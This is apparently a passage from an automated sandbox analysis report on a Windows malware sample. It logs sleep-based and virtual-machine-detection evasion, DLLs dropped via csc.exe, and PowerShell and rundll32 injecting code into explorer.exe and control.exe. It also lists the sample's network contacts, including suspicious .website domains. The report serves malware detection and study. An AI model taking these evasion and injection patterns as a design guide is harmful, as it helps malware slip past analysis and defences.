Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3376 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332 Thread sleep count: 3419 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332 Thread sleep count: 5432 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6320 Thread sleep time: -16602069666338586s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ebytp2em.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hiiw3gsl.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uio4qdnj.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hjljqxud.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3911 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5235 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3419
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5432
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B6B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_00B6B4A5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B66467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_00B66467
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_00B5BAF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_0334BAF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03356467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_03356467
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0335B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_0335B4A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B52E19 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_00B52E19
Source: explorer.exe, 00000027.00000000.705856126.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000027.00000000.735751989.00000000047D0000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATA
Source: explorer.exe, 00000027.00000000.719678172.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000027.00000000.705856126.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: RuntimeBroker.exe, 00000031.00000000.776047119.000001B91D040000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000027.00000000.726075838.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 00000027.00000000.705856126.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A1DE5 LoadLibraryA,GetProcAddress, 0_2_6E1A1DE5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B576B3 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_00B576B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_033476B3 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 3_2_033476B3

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 52.97.178.98 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.29.104.83 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.101.9.178 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.97.160.2 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: xereunrtol.website
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: zereunrtol.website
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 93C000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: AD0000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 940000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: D80000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe